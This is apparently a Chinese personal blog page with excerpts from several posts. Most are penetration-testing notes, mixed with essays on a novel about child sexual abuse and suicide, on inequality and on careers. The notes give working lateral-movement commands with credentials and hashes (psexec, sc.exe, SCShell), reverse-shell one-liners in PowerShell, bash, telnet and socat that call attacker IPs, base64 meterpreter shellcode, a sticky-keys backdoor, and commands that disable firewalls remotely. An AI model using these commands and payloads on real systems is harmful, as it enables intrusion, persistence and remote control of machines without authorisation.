发表于 | 分类于

横向移动手法介绍教程

  1. https://www.bilibili.com/video/BV1Hz4y1Z7pJ
  2. https://www.bilibili.com/video/BV1Hz4y1Z7pJ?p=2
  3. https://www.bilibili.com/video/BV1Hz4y1Z7pJ?p=3

smbmap信息搜集

远程管理必须使用Admin$

查看远程共享

1
2
3
smbmap -H 192.168.123.45

smbmap -u administrator -p 123456 -d workgroup -H 192.168.123.45

msf psexec (成功,不免杀,开启防火墙则无效)

使用的是139,445端口,目标机器必须开放这个端口。

1
2
3
4
5
6
7
8
9
10
11
1. impacket-smbserver
2. msf psexec

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.123.45
set LPORT <Local Port>
set LHOST <Local IP>
set SMBUSER <local admin username>
set SMBPASS <local admin password>
exploit

漏洞利用,使用口令去进行命令执行 mimikatz,windows明文密码放在桌面,暴力破解,

psexec.py(成功,不免杀,开启防火墙则无效)

python /usr/share/doc/python-impacket/examples/psexec.py workgroup/administrator@192.168.123.45 cmd.exe

sc.exe (成功,开启防火墙也有效,不免杀)

开启rundll32的反弹shell监听服务器,不会的可以看这个视频:https://www.bilibili.com/video/BV1ey4y1k7PA/

1
2
3
4
5
6
7
8
9
10
11
12
激活管理员账号
net user administrator /active:yes

net use \192.168.123.45\admin$ /user:"administrator" "123456"

net use \192.168.123.45\admin$ /del

net share可以查看本机开放的资源

sc \192.168.123.45 create whaleReverse15 binpath= "C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \192.168.123.123\Azye\test.dll,0"

sc \192.168.123.45 start whaleReverse15

csexec(能过360,但不能过windows防火墙)

1
2
3
4
5
6
7
8
9
10
11
net user administrator 123456
net use \192.168.28.1\admin$ /user:"administrator" "qwf123!!"
csexec.exe \192.168.28.1 cmd.exe
操作超时

net use \192.168.123.45\admin$ /user:"administrator" "123456"
csexec.exe \192.168.123.45 cmd.exe
没有安装./net2

net use \192.168.123.184\admin$ /user:"administrator" "123456"
csexec.exe \192.168.123.45 cmd.exe

用法有点复杂,没有继续看的工具

scshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
使用这篇反弹shell “https://whale3070.github.io/tools/2020/10/04/11-x/”中提到的Regsvr32.exe

regsvr32 /s /n /u /i:http://192.168.123.123:8080/6IEDA48otwgL.sct
生成一个注册表

SCShell.exe 192.168.123.45 filepermsvc "C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \192.168.123.123\rDAEep\test.dll,0" . administrastor 123456

regsvr32 /s /n /u /i:http://192.168.123.123:8080/6IEDA48otwgL.sct scrobj.dll
rundll32.exe \192.168.123.123\MJear\test.dll,0

python scshell.py -target-ip 192.168.123.45 -service-name filepermsvc -no-cmd " C:\windows\system32\rundll32.exe \192.168.123.123\rDAEep\test.dll,0" . administrastor 123456

SharpMove.exe action=query computername=192.168.123.45 query="filepermsvc" username=administrastor password=123456

SCShell.exe 192.168.123.45 filepermsvc "C:\windows\system32\cmd.exe /C C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\payload.csproj" . administrator 123456

2020.10.07

1
2
python3 scshell.py WORKGROUP/WIN-U8OIU3QM15C@192.168.123.45 -hashes aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71
C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \192.168.123.123\wLWQND\test.dll,0

原理:

1
2
3
4
5
6
7
8
sc config filepermsvc binpath= "C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe 
\192.168.123.123\wLWQND\test.dll,0"

目标机器本地执行成功
C:\Users\Administrator\Desktop\SCShell.exe local filepermsvc "C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \192.168.123.123\hltzs\test.dll,0" . administrator 123456

攻击机器执行:
D:\文件同步\tmp\横向移动参考资料\工具\SCShell-master\SCShell-master\SCShell.exe 192.168.123.45 filepermsvc "C:\windows\system32\cmd.exe /c C:\windows\system32\rundll32.exe \192.168.123.123\hltzs\test.dll,0" . administrator 123456

sharpmove

1
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService

关闭防火墙命令

关闭公网上的防火墙 netsh advfirewall set currentprofile state off

关闭内网中的防火墙 netsh advfirewall set privateprofile state off

远程关闭防火墙

netsh -r 192.168.123.45 -u administrator -p 123456 -c advfirewall set allprofiles state on https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior

https://www.windows-commandline.com/enable-disable-firewall-command-line/

参考资料

https://pentestlab.blog/2020/07/21/lateral-movement-services/

https://github.com/Mr-Un1k0d3r/SCShell

https://github.com/0xthirteen/MoveKit

https://github.com/0xthirteen/SharpMove

https://github.com/0xthirteen/SharpRDP

阅读全文 »

发表于 | 分类于

是谁把贞操牢牢刻在每个人的思想里面?

封建社会已经过去了一百多年了,封建思想在这片土地上统治了有几千年。与此同时,女性的地位也深受压迫了几千年。在以前,一个女性要是失去了丈夫,那么她就成了一个寡妇,寡妇要为了丈夫守贞。

我不知道该怎么描述房思琪的事情。

我有一种深深的无力感。因为我知道什么也改变不了。

改变不了人们对儿童性教育假性遗忘,改变不了猥亵儿童的犯罪者将手伸向豆蔻之年的花朵。

总之,这个由真实事件改编的小说反映了几个事实。

  1. 只要社会的男性把女性当成是资源,把拥有过多少女性当成是战利品。那么性侵这件事永远不会变少。你以为性侵的都是没有钱去找妓女的人吗?不是,他们享受的是强大的权力、地位等等所带来的支配弱者的征服感。

  2. 女性能够做的事情很少,我们都是幸存者。被伤害是一种概率,而不是受害者有罪。

刚刚把这本书看完了。一开始我不明白房思琪为什么和强奸犯纠缠了几年。

要知道,错误的事情,无论包装的多么精致,都不应该沉迷进去。

我尝试以自己的三观去解读这件事情,并且理解她的视角。

房思琪是一个富家女,在十三岁的时候,强奸犯住在她家隔壁(不好意思,我实在不能用老师这个词语去形容他),qjf是一个德高望重的补习班名校老师(比房思琪大37岁,也就是50岁),房思琪的父母从来没有教育过孩子任何有关性方面的内容(天知道没有性,房思琪是怎么被她妈生下来的)。在房思琪像qjf请教作文的时候,她被qj了,甚至为此道歉。

房思琪是个精致、美丽、聪明的女孩,在她的脑子里从来没有被人灌输过有关性的一切。她被qjf欺骗,说是爱情,她是被爱的。在长达5年的过程中,一直与qjf保持着这种不正常的关系。

也许她在第一次被强迫口j的时候,就应该站出来,向父母求助。也好过身心被伤害,无法过正常的生活,26岁终于自杀。

热爱文学的人也许内心都很纤细,什么是痛苦,什么是美,体会的比常人更加深刻。

作者在自杀前,曾经接受过采访,她透露出,这段关系里面是有爱的。如果没有爱,就没有这么痛苦了。

如果只是单纯的qj,那么该报案的报案,该坐牢的坐牢。而不会将一段不正常的关系维持了5年之久。

社会上的都说,被qj是受害者自己的错。不是的,作者一丁点儿错都没有。

但是她就像一个精致的透明水晶高脚杯一样,受伤害了,然后碎了。说这是谁的错?qjf固然有错,社会固然有问题。但是也许她可以更坚强更勇敢。

如果她像我一样勇敢,那么很多事情都不会发生了。也就是因为她是一个弱者,只会用文字表达在她身上遭受的伤害,所以我们才能看到这本书《房思琪的初恋乐园》。这真是一个悖论。

我尝试去理解她。但是因为三观、成长环境等等都不同。所以只能猜测,无法产生共鸣。

我不知道一个比自己大三十七岁,还强迫发生关系的老头子有什么可爱之处。但是不要对受害者要求太高,以为每个女性都是花木兰那不现实。

如果里面真的有爱情,那么作者最后就不会得抑郁症了,也就不会自杀了。可是明眼人都看得出来,qjf不过是在玩弄她罢了。

离13岁的我已经过去太久了,我不太记得清楚小时候的想法。13岁,也就是十岁出头,来到这世界上才不过十余年,相对于浩瀚的宇宙来说,动辄上千年的历史来说,太渺小了。这样稚嫩的年纪,什么都懂一点点,但是也什么都不懂。有些长得快的小孩子可能身高超过了一些成年人,但是内心却跟不上现代社会的营养过剩发育迅速,还停留在儿童阶段。

是什么让一个13岁的女孩反复的去找一个qjf,我认为,缺失的家庭教育要担任首要的责任。如果父母把小孩当成朋友的话,如果父母和孩子无话不谈的话,那么这个小女孩在遭受如此粗暴对待的时候,是不可能不跟父母倾诉的。

在书里面,房思琪的父母据说经常出差,所以让qjf无所顾忌,觉得房思琪不会说出来。确实如此,作者一直到死都没有说出来。是谁伤害了我?在我身上发生了什么?当作者自杀以后,一切都太晚了。

为什么世界上有人宁愿伤害自己,也不愿意伤害别人。

据说作者出生在一个古老的医学世家,并且得了抑郁症还考上了医科大学。因为病情辍学以后又考上了一个中文系。

她的家庭要求她优秀,但是不要求她幸福、快乐。

我想想,她的父母只怕是这么想的:一个女孩子,考最好的学校,打扮的漂漂亮亮,然后嫁给一个好丈夫。没有人鼓励她发挥自己的个性,没有人在乎她的理想,没有人在乎她幸不幸福,快不快乐。

那么她选择离开这个世界,也是情有可原的。

那些自杀者不是看不清,而是看得太清楚。他们想明白了一切,而不是别人口中的想不开。

阅读全文 »

发表于 | 分类于

引子

以你现在的速度你只能逗留原地。如果你要抵达另一个地方,你必须以双倍于现在的速度奔跑。

思维导图和教程

反弹shell- 视频目录

一句话反弹shell&Reverse Shell In Windows

windows

mshta.exe

成功的操作

1
2
3
4
5
6
7
8
use exploit/windows/misc/hta_server
set srvhost 10.100.19.19
set lhost 10.100.19.19
set SRVPORT 53
exploit

mshta.exe http://10.100.19.19:53/tA7YRzR.hta

1

失败的操作

设置payload msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.19.19 LPORT=53 -f raw > shellcode.bin

cat shellcode.bin | base64 -w 0 > out.txt 将shellcode.bin base64编码

1
/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAAA1CgoTE0FUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V

handler -H 10.100.19.19 -P 53 -p windows/meterpreter/reverse_tcp

mshta.exe http://10.100.19.19/CACTUSTORCH.hta

易错点

handler不能设置为exploit/multi/handler

rundll.exe

use windows/smb/smb_delivery

set srvhost 192.168.123.123

rundll32.exe \192.168.1.109\vabFG\test.dll,0

Regsvr32.exe

1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

powershell & powercat

nc -lnvp 4455

1
2
3
4
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.123.123",4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
这个代码反弹失败
---
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.123.123',4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

linux

bash

bash tcp

nc -lnvp 4456 bash -i >& /dev/tcp/18.166.7.104/4456 0>&1

bash2 (失败)

1
2
3
nc -lnvp 4456
exec 5<>/dev/tcp/18.166.7.104/4456
cat <&5 | while read line; do $line 2>&5 >&5; done

bash udp(失败)

nc -lnvp 4457 sh -i >& /dev/udp/18.166.7.104/4457 0>&1

sh

victim:

sh -i >& /dev/udp/192.168.3.253/4242 0>&1

Centos7:

csh -i >& /dev/udp/192.168.3.253/4242 0>&1

telnet

建立连接

1
2
3
4
nc -n -vv -l -p 8080 
nc -n -vv -l -p 8081
Victim 
telnet 18.166.7.104  8080 | /bin/bash | telnet 18.166.7.104  8081

反弹shell

1
2
nc -lnvp 4456
rm -f /tmp/p; mknod /tmp/p p && telnet 18.166.7.104 4456 0/tmp/p

socat

建立连接

目标机器监听: socat TCP4-listen:4433 STDOUT

本地连接目标机器: socat - TCP4:18.166.7.104:4433

反弹shell

vps(18.166.7.104)上监听: socat -d -d TCP4-LISTEN:4434 STDOUT

本地kali将shell发送到vps (内网机器运行)socat TCP4:18.166.7.104:4434 EXEC:/bin/bash

反弹shell 二

1
2
(18.166.7.104公网机器运行)socat TCP4-listen:4435 STDOUT
(内网机器运行)socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:18.166.7.104:4435

参考资料

https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/

阅读全文 »

发表于 | 分类于

linux内核漏洞提权

只要是稍微懈怠一下,上帝会以最快的速度带走你的天赋和能力,一秒钟都不会耽搁。

https://www.bilibili.com/video/BV1Rh411o7M9

前置知识

linux操作系统

不会的,可以看《鸟哥的linux私房菜》

操作

用脚本找内核漏洞

查找exp (修改exp) 上传exp 执行exp

searchsploit

工具链接

linux-exploit-suggester.sh

LinEnum.sh

msf suggester

参考资料

https://github.com/sagishahar-zz/lpeworkshop

阅读全文 »

发表于 | 分类于

从18岁上大学,到今天已经过了近5年。其中我的很多想法都改变了,也有很多还是老样子。就像蝴蝶效应一样,很多年前做的事情,都深深影响着今天我在哪里、做着什么事、成为了什么样的人。我还是很喜欢读书,思考一些一般人觉得无稽之谈,没必要思考的问题。作为一个死宅,还是没能学会与人打交道游刃有余的手段。

阅读全文 »

发表于 | 分类于

最近有一个24岁的女大学生死了,听说是翼装飞行意外事故去世的。

我第一想法是,每年意外事故去世的那么多,为什么她的死亡会上热搜?

这就要深入介绍一下翼装飞行了。翼装飞行是一种刺激的极限运动,很烧钱,比学艺术烧钱多了。

首先要有上百次的高空跳伞经验,才能开始翼装飞行。装备十万起步,数百次跳伞经验,就算花了一百万吧,这是按少了说的。就说刘某(死者)请的教练,是世界顶级水平,就不知道要花多少钱。

这种娱乐,对于她的家庭,应该算不上什么大钱。按照她花了百分之一的钱来玩这些,那么她的家庭至少是千万富翁(当然这是按照保守情况计算的)。再联想一下19年、20年的出生率。我国的贫富差距已经快达到了极限。穷人连一胎都生不起的情况下,富人出生就是富人,世世代代都是富人。这就是资本回报率大于劳动回报率所带来的结果。趋势已经很明显了。

农村出凤凰男的几率越来越小,北京市文科状元熊轩昂说他多亏了家庭和学校的教育,现在的状元都是这种家里又好又厉害的。,说穷人越来越不可能争的过有钱人了。

也许这是一种社会达尔文主义。穷人正在逐渐被社会淘汰。就像古代佃农因为有钱人三妻四妾,而找不到老婆结不起婚一样。 现代996的所谓白领,不过是地主手下成千上万的佃农。

地主以为996是福报,也就算了。可不要身为佃农认为996也是福报。

怎么办

冷嘲热讽说了也没用,那我们应该怎么办呢?韩国人再努力,阶级固化摆在那里,内卷化摆在那里,不出国而在本国努力, 努力的结果都被有钱人收割走了。为什么这么说,假如你努力存钱,存了十年的钱,房价一下子涨了几十万。 那你选择买房,钱不就白存了。劳动被谁收割了?

这就是现实。中国平均福利太差,房价、教育、养老、医疗,压在普通人身上的三座大山,一辈子都被这个套牢了。 一旦你选择结婚生子,那你一辈子的命运已经注定了。你不在为自己而活,你活着就是劳动力,为你的父母、子女、妻子而活。

为什么某些中年男性员工一旦失业,就跳楼呢?不在局中,永远不知道压力有多大。人的悲欢并不相通。

不要轻率评价他人的痛苦。

如果贫富差距一直这么大,会带来什么结果

我们首先看一下美国,这次疫情美国什么表现,我们有目共睹。 美国是一个割裂的社会,富人更容易成为精英、穷人无知而且产业链还迁移到其他国家,导致穷人失去工作。

有很多美国人甚至不知道地球是圆的。公立学校放羊、私立学校要有钱人才读得起。美国用福利把穷人圈起来,用移民撑起了世界霸主的地位。

如果中国的贫富差距这么大。中国不是发达国家,无法用福利引导穷人生育下一代,如果又无法阻止富人在国内赚够钱,带走他们的财产。那么中国的结局似乎已经注定了。毕竟,一个连新生儿人口数都无法撑起来的国家,又怎么能再延续5000年呢?

古代没有避孕措施、没有移民、无法出国留学、工作、也没有老龄化。而现代社会,也无法模拟古代社会来延续下一代。 让我们看看2020年的生育结果吧以及人口普查结果吧。关于这方面我在知乎上高赞的回答,以及我收藏的相关回答都被删了。

比如一个老板,生了二胎、三胎,他雇佣了100名员工,其中百分之20生了二胎,百分之30生了一胎,百分之50不结婚,或者丁克,或者无法生育。那么总和生育率就是73/101 = 0.722

基本上符合资本主义国家不到1.0的生育率。网上搜索一下,始终坚持不到1.0的生育率的国家未来终于会灭亡的。只不过过去是通过战争,今天是通过主动选择了灭亡。

说实话,如果你出生在一个富裕的家庭,你的爸爸是马云、是李刚,那么这些问题都与你无缘。毕竟无产阶级斗争了几千年,断头王后安托瓦内特也就那么一个,文革中被打倒的臭老九也已经是过去式了,这种历史在你短短的几十年中几乎不会再重演了。

韩国网络上近日流行起“勺子阶级论”,这种阶级论把20~39岁年轻人的父母年收入等家庭背景比喻为各种不同的“勺子”,按照家庭背景可分为“金勺”、“银勺”、“铜勺”和“土勺”四个不同阶级。

从具体标准来看,“金勺”指家庭财产高于20亿韩元(约合人民币1143万元)或年收入高于2亿韩元;“银勺”指家庭财产高于10亿韩元或年收入高于1亿韩元;“铜勺”指家庭财产高于5亿韩元或年收入5500万韩元;家庭财产低于5000万韩元或年收入低于2000万韩元的则被称为“土勺”。

韩国20~39岁年轻人面临着就业难、结婚难、低收入等种种问题,这样的境遇让他们相信,无论个人多么努力积累财富,永远不会“富得过”那些继承父母大量遗产的“金汤勺”们。

阅读全文 »

发表于 | 分类于

引子

有空再写,没空就自己找答案吧。。

TCP 为什么三次握手而不是两次握手

https://blog.csdn.net/lengxiao1993/article/details/82771768

为了实现可靠数据传输, TCP 协议的通信双方, 都必须维护一个序列号, 以标识发送出去的数据包中, 哪些是已经被对方收到的。为了实现可靠传输,发送方和接收方始终需要同步( SYNchronize )序号。

如果只是两次握手, 至多只有连接发起方的起始序列号能被确认, 另一方选择的序列号则得不到确认

客户端发送一个请求,服务器回复一份序列号,客户端发送我收到了序列号。

工作组和域的区别

  1. 大小 工作组比较小,不超过20台。域用在比较大的网络,成百上千台。
  2. 拓扑图 工作组中,所有机器的地位是平等的,一台计算机可以自由的加入或退出一个工作组。
  3. 验证方式 在工作组中,用户名、密码存放在本地计算机。如果要登入其他计算机,必须提供用户名,密码;在域中,有一台域控(DC)服务器,其他计算机都要通过DC验证才能加入域。有域权限,可以登入任何域内计算机,无需知道计算机的账号也可以登入。
  4. 网络 工作组计算机必须在同一个子网中;域的计算机可以在不同的本地网络中。

正向代理和反向代理的区别

正向代理:对服务器来说,客户端是透明的(未知的)。比如说翻墙使用的个人专用服务器,就是正向代理,代理替客户端取回google上的资料,而服务器只知道代理服务器取得了资料,不知道是哪个客户端。

反向代理:对客户端来说,服务端是未知的。比如说nginx可以做负载分流作用的反向代理服务器,作用是当有很多请求的时候,它会将请求分流,发送到不同的服务器,防止单台服务器因为过载而崩溃。于是客户端只知道反向代理服务器替我们取回了请求的资源,而不知道那台具体是哪台服务端发送的。

sql宽字节注入

在cms中,对sql注入使用了addslashes函数,对输入的参数进行了转义,单引号前加上反斜杠进行转义。

在mysql中,使用GBK编码,认为2个字符是一个汉字。在前面加%a1等字符,使前面字符和反斜杠能够组合为一个汉字,于是反斜杠就不能对单引号进行转义了。

cobalt strike的代理

redis未授权的利用过程

linux上好像是 写公钥,利用web服务写马,contrab定时任务 然后windows是利用自启动服务,还有web服务,没有web服务就只能重启

csrf和ssrf的区别

有哪些逻辑漏洞

浏览器同源策略

1

阅读全文 »

发表于 | 分类于

信息安全行业现状

1994年4月20日,中国正式接入因特网。

至今2020年,历史短短26年。

国内信息安全企业成立时间长的,哪怕是大企业,也就十多年历史。国内院校培养的信息安全人才远远落后于市场要求。而拥有数十年经验的信息安全人才屈指可数。

院校中能够教授信息安全领域渗透测试方向的老师,可以说是几乎没有。

从2018年开始在信息安全领域打杂以来,看到的Sec的博士也很年轻,不过二三十岁。不是鄙视年轻人,医学方向我们都知道老医生比年轻医生更有经验,所以经验也是很重要的。而作为有经验的基础——年龄大,也是一个充分不必要条件。就说业内很有名的黑客余弦、tomkeeper(2001-2020,有近20年的经验),也是拥有着多年的行业经验。

无论是通过信安混口饭吃的、还是以各个大黑阔为目标的各位,都应该踏踏实实努力个十年再说。

虽然

  • 现在行业各种标准都十分混乱
  • 许多小公司都没有培养人才的能力和愿望
  • 很多公司都不注重信息安全
  • 很多公司注重 销售>技术人员
  • 技术人员承担承担成才时间极长、单干可能性极低,就业面极窄的风险
  • 公司更愿意挖人,而不是培养人才 因为挖人只需要付工资,而培养人才,一旦培养成为能够上手工作的熟练人员,那么可能跳槽,所有付出的培养成本都打水漂
  • 是风险也是机遇。很多成熟的行业各种管理标准都很完善。只能熬资历、拼学历,入行晚了就没有发挥的空间了。大头利润都由业内前辈抽走。有哪些成熟行业这里就不举例了,免得杠精来杠。

但是只要互联网还存在于地球一天、程序员还是由人类编写为止,信息安全都是不愁被AI取代的、不愁没有工作的。

技术行业的风险

作者:天玹六 链接:https://www.zhihu.com/question/54696826/answer/601826541 来源:知乎 著作权归作者所有,转载请联系作者获得授权。

其实所有技术岗都面临四重风险:门槛极高,成才时间极长,单干可能性极低,就业面极窄,并且越牛B的技术岗这四个特征越发突出。 (举例:诺斯诺普格鲁曼公司的核动力航空母舰造船厂及B2幽灵隐形轰炸机工厂,什么进去了你还想跳出来单干??还想跳槽?? 除非你有本事飞出太阳系,否则可能性不是很大)风险总是需要有人承担的,我认为这个点正是中外工业企业一个最本质的差异。

在发达资本主义国家,风险是由企业承担大部分,个人承担小部分(如承诺不裁员,应届生明明没有产出仍然高薪先养着, 技术方向晋升的报酬与管理方向持平甚至略高,行业联盟不搞恶性竞争等,个人往往仅承担行业的系统风险), 而在我国,就业风险全部由个人承担(如随时裁员,应届生没有产出那就先吃屎,做技术的永远是狗,行业永远只搞恶性竞争)。更加恶劣的是,个人非但需要承担全部风险,大部分企业还会利用技术人员个人命运与企业命运捆绑,放弃工作的成本极高的事实(比如我的放弃成本就足以令90%以上的机械工程师打消放弃的念头,但是与其让我放弃生命的尊严而苟活于机械行业,我宁愿放弃生命,我要不是31岁还能啃老估计现在已经重新投胎了),来压低技术人员的报酬水平。

如果有善良的企业不这样做,就会劣币驱逐良币,反而死得更快。(举例:X东前几年不是很牛逼吗?帮快递小哥交五险一金,呵呵呵,现在是按国家规定交五险一金的X东活不下去,还是不交的X丰X通X达活不下去?以前交多了现在降一点,被千夫所指啊,一开始就不交不就什么事都没有了吗?)

企业这种行为导致的严重后果,我称之为“一代而亡”,即技术员哪怕侥幸能够娶妻生子,他也会拼了老命阻止他的下一代进入自己的行业,说得文绉绉一点,就是“人才断层”。机械人才已经断了多少层,我就不再负能量了。

ps:现在媒体不正视“人才断层”的恶劣现实,还在鼓吹“XX核心研发团队平均年龄不到30岁”“相比起美国企业平均年龄50岁的死气沉沉,我们这边朝气勃发”…我不知道从什么时候开始,我们国家的工程师变得跟妓女一样越年轻越值钱了?拿机械工程师跟妓女相提并论,这也太过抬举机械工程师了吧?每个妓女都用得起iphone,机械工程师用得起吗?

技术岗位,初级过剩高级紧缺

作者:胡嵩 链接:https://www.zhihu.com/question/356982241/answer/1010277323 来源:知乎 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

前面有答主已经很简短有力的回答了: 初级过剩,高级紧缺。其实以我这么多年的招聘经验(发出1000+ offer, 面试数倍人)来看, 市场的供给情况比这个还要糟糕, 或者说对于有志在技术领域发展的程序员朋友, 前景比你想象的还要好。 市场上90%的程序员达不到大厂的entry level(准入门槛),也就是狼厂的T3,给到正常应届毕业生的及格线。 注意这个讨论的全集并不是初级程序员, 而是全部相关专业的程序员。也就是说市场上很多工作多年的『资深』程序员也达不到这个标准。 T3是啥要求呢? 不管是前端、后端、架构还是算法, 只要能 熟练掌握语言和工具 ,靠谱的完成模块级的开发工作。 按照大家的简历描述, 100%肯定都over qualify了。 可真相仍然是, 在所有简历池子里随机抽取100个, 不到10个能通过狼厂T3级别的面试。 光笔试就可以干掉一大半。原因在于两个字: 基础。且不说绝大部分非科班出身的程序员, 压根就没打算把基础打牢固。 就是我们每年去985 211校招的那些对口专业, 真正把基础学好吃透的学生真是太少了。

学java搞服务端的同学, 有多少真搞懂了引用计数和回收机制?做前端的同学有多少真的理解从用户事件触发到页面刷新, 浏览器侧、网络、后端都发生了什么?常见的算法复杂度放到实际应用问题中, 真没几个能答的上来。

这些可能在不少程序员眼中属于日常用不着的冷知识, 可是真的到了生产环境中, 面临实际问题的时候, 这些基础问题就能把简历上写着各种精通、各种熟练的高手们难倒。

能照猫画虎用成熟框架把代码出来是一码事, 能高效交付高质量的工程成果是另一码事。每次大规模校招, 都不免要感慨一下学校的教育和业界的需求脱节。日常的社招, 更让人感叹,大部分程序员的工作都是重复, 没有在技术提升上起到什么作用。所以, 真正有技术追求的朋友们,不要关心统计数据, 机会大把。

阅读全文 »

发表于 | 分类于

参考资料

失败的操作

1
2
3
4
5
cd c:\windows\system32
move sethc.exe sethc.exe.bak			#重命名sethc.exe为sethc.exe.bak
copy /y cmd.exe sethc.exe
全都提示拒绝访问
本地管理员权限不行、system权限也不行。

成功的操作

1
2
3
4
5
6
7
move C:\Users\user\Desktop\p.exe C:\windows\system32\p.exe   #将p.exe移动到另一个地址,p.exe是一个反弹shell的exe.

#需要本地管理员权限
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

#在登陆面板输入5个shift,即可获得反弹的system权限shell
缺点,在登陆以后,就会丢失反弹连接。

使用场景:在3389远程登陆的时候,无需登陆,调出system权限cmd.exe

实验

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
在受害机器设置user authentication,不需要验证。那么其他机器登入的时候,就会无需验证获得登陆面板。
PS C:\Users\Administrator> REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDtyLayer /t REG_DWORD /d 0

---
受害机器替换cmd.exe,在登陆面板5个shift调出cmd.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

---
管理员权限命令开启3389远程登陆
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

windows 10 无效
windows 2008 R2 有效
阅读全文 »